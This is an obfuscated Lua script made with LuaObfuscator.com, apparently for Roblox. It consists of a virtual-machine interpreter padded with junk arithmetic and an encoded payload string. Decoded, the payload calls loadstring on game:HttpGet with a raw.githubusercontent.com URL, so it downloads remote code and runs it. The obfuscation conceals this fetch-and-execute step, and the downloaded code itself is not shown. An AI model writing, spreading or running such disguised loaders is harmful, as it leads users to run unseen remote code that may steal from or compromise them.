--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.5b) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (v17==2) then function v21()local v38=0 + 0;local v39;while true do if ((0 -0)==v38) then v39=v1(v15,v18,v18);v18=v18 + (3 -(358 -(201 + 155)));v38=1 + 0;end if ((3 -2)==v38) then return v39;end end end v22=nil;function v22()local v40=(8641 -6792) -(1423 + 426);local v41;local v42;while true do if (v40==(1 + 0)) then return (v42 * (1010 -754)) + v41;end if (v40==(0 + 0)) then v41,v42=v1(v15,v18,v18 + (284 -(53 + 229)));v18=v18 + 2;v40=2 -1;end end end v17=3;end if (v17==7) then function v29(v30,v31,v32)local v43=0;local v44;local v45;local v46;while true do if (v43==1) then v46=v30[3];return function(...)local v73=1;local v74= -1;local v75={...};local v76=v11("#",...) -1;local function v77()local v81=v44;local v82=Const;local v83=v45;local v84=v46;local v85=v27;local v86={};local v87={};local v88={};for v96=(0 + 0) -0,v76 do if ((v96>=v84) or ((599 + 77 + 9)>=((3156 + 298) -(1195 + 500)))) then v86[v96-v84]=v75[v96 + 1];else v88[v96]=v75[v96 + (1275 -(182 + 1092))];end end local v89=(v76-v84) + 1;local v90;local v91;while true do local v97=1655 -(560 + 1095);local v98;while true do if ((v97==(0 + 0)) or ((5141 -((2540 -1881) + 298))==(6023 -2787))) then v98=1637 -(1146 + 269 + 222);while true do if ((v98==0) or ((1457 -1043)>2192)) then local v107=0 -0;while true do if ((v107==(394 -(273 + 83 + 38))) or ((3377 -((2640 -(86 + 1426)) + 78))<(1818 -(742 + 800)))) then local v110=0;while true do if ((v110==(570 -(239 + 330))) or ((1836 + 2300)==1558)) then v107=1 + 0;break;end if ((v110==(0 -0)) or ((133 + 741)>(11499 -7007))) then v90=v81[v73];v91=v90[1];v110=1;end end end if ((3300<4403) and (v107==(1 -0))) then v98=1 + 0;break;end end end if ((v98==1) or ((2830 -1885)>(6828 -4924))) then if (((2791 -(1333 + 132))<(3291 -1830)) and (v91<=(5 -3))) then if ((v91<=(0 -0)) or (4443<=(2721 -(343 + 1003)))) then local v111=247 -(52 + 195);local v112;local v113;local v114;local v115;local v116;while true do if (((2451 -(21 + (497 -209)))<=4635) and (v111==(2 + 0))) then v116=nil;while true do if ((v112==1) or ((269 + 700)>(2541 + 261))) then local v141=0 -0;local v142;while true do if ((v141==(0 -0)) or ((5008 -(229 + 827))<=(533 + 732))) then v142=1371 -(1177 + 194);while true do if ((v142==(503 -(87 + (1646 -(1014 + 216))))) or (206>((1585 + 187) -(157 + (1785 -(292 + 510)))))) then v74=(v115 + v113) -(357 -(195 + 161));v116=1437 -(422 + 1015);v142=2 -1;end if ((v142==(1 + 0)) or ((2061 -(74 + 317))==3179)) then v112=887 -(489 + 396);break;end end break;end end end if (((12014 -(9459 -(982 + 463)))>(11502 -(4512 + 3058))) and (v112==(1795 -(1655 + 140)))) then local v143=1519 -(48 + 1471);local v144;while true do if (((10114 -7556)>(627 + 89)) and (v143==(0 -0))) then v144=0 -0;while true do if (((1 + (1453 -(520 + 933)))==v144) or ((5546 -(423 + 239))<(2843 + 0))) then v112=1 + 0;break;end if ((833==(1983 -(84 + 1066))) and (v144==(0 -0))) then v113=v90[2];v114,v115=v85(v88[v113](v12(v88,v113 + (1 -0),v90[(2322 -(533 + 1371)) -(386 + 29)])));v144=1;end end break;end end end if ((v112==2) or ((10580 -7584)==(2804 -(600 + 722)))) then for v145=v113,v74 do local v146=0 + 0;local v147;while true do if (((0 + 0)==v146) or ((2971 -(276 + 1108))<=585)) then v147=1939 -(1586 + (1362 -(9 + 1000)));while true do if ((v147==(0 + 0)) or ((429 + (305 -(35 + 244)))>(3525 -(191 + 1675)))) then v116=v116 + 1;v88[v145]=v114[v116];break;end end break;end end end break;end end break;end if (((14814 -11564)>=(8065 -4950)) and (v111==(0 + 0))) then local v132=0 -0;while true do if ((1==v132) or (3801>=(4289 -(221 + 37)))) then v111=3 -2;break;end if (((5525 -(65 + 843))>1084) and (v132==(0 -0))) then v112=0;v113=nil;v132=1 + 0;end end end if ((v111==(465 -(273 + 187 + 4))) or ((6324 -(1029 + 719))<=(695 + 107))) then local v133=0 -0;while true do if ((v133==(1434 -(309 + 1124))) or (2680>=(10280 -(5541 + 1969)))) then v111=1 + 1 + 0;break;end if ((v133==(182 -(53 + 86 + 43))) or (((3824 + 1300) -1915)>(4343 + 66))) then v114=nil;v115=nil;v133=(10 + 196) -(106 + 43 + 56);end end end end elseif (((1634 -(136 + 282))>627) and (v91>(1 + 0))) then v88[v90[1676 -(713 + (2240 -1279))]]();else v88[v90[214 -((1107 -(568 + 514)) + 187)]]=v32[v90[6 -3]];end elseif ((v91<=(1464 -(519 + 941))) or ((1040 + 1359)<(241 + 316))) then if ((1383<=2526) and (v91>(6 -3))) then local v124=1316 -(402 + 369 + 545);local v125;local v126;local v127;while true do if (((336 + 1849)<=((20037 + 2094) -17452)) and (v124==((0 -0) -(0 + 0)))) then v125=0 -0;v126=nil;v124=1 + (1675 -(1382 + 293));end if (((5741 -3357)>=((2235 -(1395 + 90)) + 812)) and (v124==(1 + 0))) then v127=nil;while true do if ((v125==(0 -0)) or ((928 + 1217)==(4658 -(255 + 294)))) then local v153=0 -(1044 -(650 + 394));while true do if ((((174 + 5262) -(1053 + 209))==(1252 + 2922)) and (v153==(539 -(296 + 47 + 195)))) then v125=2 -1;break;end if ((v153==(0 -0)) or (4493<(2375 -(207 + 321 + 9)))) then v126=v90[1 + 1];v127=v88[v90[1654 -(1290 + 164 + 197)]];v153=1237 -(420 + 816);end end end if ((419<(3327 -1459)) and ((1148 -(665 + 482))==v125)) then v88[v126 + (2 -1)]=v127;v88[v126]=v127[v90[781 -(101 + 99 + 577)]];break;end end break;end end else local v128=0 -0;local v129;local v130;while true do if (((0 + 0)==v128) or ((4820 -2442)>=4100)) then v129=0;v130=nil;v128=2 -(2 -1);end if ((v128==(362 -(343 + 18))) or (((1252 + 579) -(473 + 877))==4631)) then while true do if ((4386<(2226 + 2162)) and (v129==0)) then v130=v90[2 -0];v88[v130]=v88[v130](v12(v88,v130 + (1196 -(1098 + (2038 -(1199 + 742)))),v74));break;end end break;end end end elseif ((v91==5) or ((5985 -4612)>(2883 + 464))) then v88[v90[1390 -(670 + 718)]]=v90[(186 -(138 + 47)) + 2];else do return;end end v73=v73 + (1510 -(653 + 856));break;end end break;end end end end A,B=v27(v10(v77));if  not A[1] then local v92=v30[4][v73] or "?";error("Script error at ["   .. v92   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end if (v43==0) then v44=v30[1];v45=v30[2];v43=1;end end end return v29(v28(),{},v16)();end if (4==v17) then function v24()local v47=0 -0;local v48;local v49;while true do if ((0 -0)==v47) then v48=v23();v49=v23();v47=1 + 0;end if (v47==(1 -0)) then return (( -2 * v20(v49,75 -43)) + (3 -2)) * ((1 + 1)^(v20(v49,1131 -(994 + 116),53 -(76 -54)) -1023)) * ((((v20(v49,1 + 0,1260 -(1146 + 83 + 11)) * ((6 -(11 -7))^32)) + v48)/((185 -(93 + 90))^52)) + (2 -1));end end end v25=nil;function v25(v33)local v50=0;local v51;local v52;while true do if (v50==1) then v51=v3(v15,v18,(v18 + v33) -(1801 -(1705 + 95)));v18=v18 + v33;v50=2;end if (v50==(6 -3)) then return v6(v52);end if ((0 -0)==v50) then v51=nil;if  not v33 then local v78=(1407 + 197) -(380 + (1762 -538));while true do if (v78==(0 -0)) then v33=v23();if (v33==(0 + 0)) then return "";end break;end end end v50=3 -2;end if ((500 -(27 + 471))==v50) then v52={};for v71=1 + 0, #v51 do v52[v71]=v2(v1(v3(v51,v71,v71)));end v50=3;end end end v17=5;end if (0==v17) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v34)if (v1(v34,2)==79) then local v66=0;while true do if (v66==0) then v19=v0(v3(v34,1,1));return "";end end else local v67=0;local v68;while true do if (0==v67) then v68=v2(v0(v34,16));if v19 then local v93=0;local v94;while true do if (v93==0) then v94=v5(v68,v19);v19=nil;v93=1;end if (v93==1) then return v94;end end else return v68;end break;end end end end);v17=1;end if (v17==3) then v23=nil;function v23()local v53,v54,v55,v56=v1(v15,v18,v18 + (1734 -(707 + 713 + 311)));v18=v18 + (1 -0) + 2 + 1;return (v56 * 16777216) + (v55 * 65536) + (v54 * (869 -(53 + (1800 -(1031 + 209))))) + v53;end v24=nil;v17=4;end if (v17==6) then v28=nil;function v28()local v57=0;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v57==(1 + 0)) then v60=nil;v61=nil;v57=88 -(43 + 43);end if (v57==2) then v62=nil;v63=nil;v57=966 -(195 + 768);end if (v57==(671 -(550 + 117))) then while true do if (v58~=(1 + 0)) then else v61=nil;v62=nil;v58=120 -(12 + 106);end if (v58~=(0 + 0)) then else local v79=0 -0;while true do if (v79~=0) then else v59=0;v60=nil;v79=1;end if (v79==(1 + 0)) then v58=1;break;end end end if (v58~=(2 + 0)) then else local v80=300 -(259 + 41);while true do if (v80~=(0 -0)) then else v63=nil;v64=nil;v80=1;end if (v80~=1) then else v58=3;break;end end end if (v58~=3) then else v65=nil;while true do local v95=0 + 0;while true do if (v95~=(1254 -(1005 + 249))) then else if (v59~=(5 -3)) then else local v101=543 -(102 + 441);local v102;while true do if (v101==0) then v102=0;while true do if (0==v102) then local v117=1759 -(15 + 1744);while true do if (v117~=(0 + 0)) then else for v136=841 -(832 + 8),v64 do local v137=0;local v138;local v139;local v140;while true do if (0~=v137) then else v138=1594 -(1239 + 355);v139=nil;v137=972 -(479 + 492);end if (v137==(1 + 0)) then v140=nil;while true do if (v138~=(826 -(630 + 196))) then else v139=v21();v140=nil;v138=2 -1;end if (v138==1) then if (v139==(1 + 0)) then v140=v21()~=0;elseif (v139==(5 -3)) then v140=v24();elseif (v139~=3) then else v140=v25();end v65[v136]=v140;break;end end break;end end end v63[3]=v21();v117=1;end if ((1 -0)~=v117) then else v102=1;break;end end end if (v102~=1) then else for v118=1 -0,v23() do local v119=0;local v120;local v121;local v122;while true do if ((0 + 0)==v119) then v120=0 + 0;v121=nil;v119=1 + 0;end if (v119~=(4 -3)) then else v122=nil;while true do if (v120~=(0 -0)) then else local v148=401 -(354 + 47);while true do if (v148==(1917 -(1458 + 459))) then v121=0;v122=nil;v148=1;end if (v148~=1) then else v120=1 + 0;break;end end end if (1==v120) then while true do if (0==v121) then v122=v21();if (v20(v122,3 -2,2 -1)==0) then local v158=0 -0;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=(0 + 0)) then else v159=0 -0;v160=nil;v158=1369 -(989 + 379);end if (v158~=2) then else v163=nil;while true do if (v159~=1) then else local v165=1162 -(787 + 375);local v166;while true do if (v165==0) then v166=0 + 0;while true do if (v166~=(0 + 0)) then else v162=nil;v163=nil;v166=1;end if (v166~=1) then else v159=1 + 1;break;end end break;end end end if (v159~=0) then else local v167=0 -0;while true do if (v167==(1 -0)) then v159=1166 -(465 + 700);break;end if (v167==0) then local v168=0;while true do if (v168~=(2 -1)) then else v167=1 + 0;break;end if (v168~=(0 + 0)) then else v160=0;v161=nil;v168=1;end end end end end if (v159==(1 + 1)) then while true do if (v160==(1274 -(387 + 887))) then local v169=0 + 0;local v170;while true do if (v169~=(0 + 0)) then else v170=0;while true do if (v170==0) then local v178=1017 -(886 + 131);while true do if (0~=v178) then else local v181=0 -0;while true do if (v181~=(2 -1)) then else v178=1 + 0;break;end if (v181==(0 + 0)) then v161=v20(v122,2,685 -(437 + 245));v162=v20(v122,1972 -(1216 + 752),6);v181=1;end end end if (v178==(1 -0)) then v170=693 -(188 + 504);break;end end end if (v170~=1) then else v160=1 -0;break;end end break;end end end if (v160~=1) then else local v171=0;local v172;local v173;while true do if (v171~=(1 + 0)) then else while true do if (v172==0) then v173=0 + 0;while true do if (v173~=1) then else v160=2 + 0;break;end if (v173==(0 + 0)) then local v182=0;while true do if (v182==1) then v173=1;break;end if (v182==0) then v163={v22(),v22(),nil,nil};if (v161==0) then local v183=0;local v184;while true do if (v183~=(127 -(29 + 98))) then else v184=0;while true do if (v184~=0) then else v163[3]=v22();v163[4]=v22();break;end end break;end end elseif (v161==1) then v163[5 -2]=v23();elseif (v161==(1366 -(474 + 890))) then v163[11 -8]=v23() -(2^16);elseif (v161==(7 -4)) then local v191=1649 -(877 + 772);local v192;while true do if (v191~=(437 -(334 + 103))) then else v192=0;while true do if (v192~=0) then else v163[3]=v23() -((1675 -(1184 + 489))^16);v163[4]=v22();break;end end break;end end end v182=1621 -(135 + 1485);end end end end break;end end break;end if (0==v171) then v172=0;v173=nil;v171=3 -2;end end end if (v160==(2 + 1)) then if (v20(v162,3,5 -2)~=(947 -(334 + 612))) then else v163[1 + 3]=v65[v163[14 -10]];end v60[v118]=v163;break;end if (v160~=2) then else local v175=0 -0;local v176;while true do if (v175==0) then v176=0;while true do if (v176==0) then local v179=1000 -(254 + 746);local v180;while true do if (v179==(1777 -(1451 + 326))) then v180=0;while true do if (v180==(0 + 0)) then if (v20(v162,2 -1,1)~=(2 -1)) then else v163[2]=v65[v163[2]];end if (v20(v162,2,6 -4)~=1) then else v163[3]=v65[v163[2 + 1]];end v180=1 + 0;end if (v180==1) then v176=1;break;end end break;end end end if (v176==1) then v160=3;break;end end break;end end end end break;end end break;end if (v158~=(2 -1)) then else v161=nil;v162=nil;v158=2;end end end break;end end break;end end break;end end end v59=3;break;end end break;end end end if (v59~=(1 + 0)) then else local v103=836 -(234 + 602);while true do if (v103==0) then local v108=0;while true do if (v108~=0) then else v63={v60,v61,nil,v62};v64=v23();v108=1;end if (v108~=(1 -0)) then else v103=1;break;end end end if (v103==(1 + 0)) then v65={};v59=2;break;end end end v95=1;end if (v95==1) then if (v59~=(422 -(133 + 286))) then else local v104=0 -0;local v105;while true do if ((0 -0)~=v104) then else v105=0 + 0;while true do local v109=0;while true do if ((508 -(406 + 102))==v109) then if (0~=v105) then else local v135=1323 -(307 + 1016);while true do if (v135==1) then v105=2 -1;break;end if (0==v135) then for v149=569 -(42 + 526),v23() do v61[v149-1]=v28();end for v151=1,v23() do v62[v151]=v23();end v135=1 + 0;end end end if (v105==1) then return v63;end break;end end end break;end end end if (v59==0) then local v106=0;while true do if (v106==0) then v60={};v61={};v106=1 -0;end if (1==v106) then v62={};v59=1;break;end end end break;end end end break;end end break;end if ((113 -(32 + 81))~=v57) then else v58=0;v59=nil;v57=1 -0;end if (v57==(1 + 2)) then v64=nil;v65=nil;v57=4;end end end v29=nil;v17=7;end if (v17==5) then v26=v23;v27=nil;function v27(...)return {...},v11("#",...);end v17=6;end if (1==v17) then v20=nil;function v20(v35,v36,v37)if v37 then local v69=(v35/((2 + 0)^(v36-1)))%((1 + 1)^(((v37-(2 -1)) -(v36-1)) + (2 -1)));return v69-(v69%(3 -2));else local v70=(2 + 0 + 0)^(v36-(1 -0));return (((v35%(v70 + v70))>=v70) and (1 + 0)) or 0;end end v21=nil;v17=2;end end end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F777A72732O652F53752O6E792F6D61696E2F53752O6E792532303O6100083O0012013O00013O001201000100023O002004000100010003001205000300046O000100034O00035O00022O00023O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
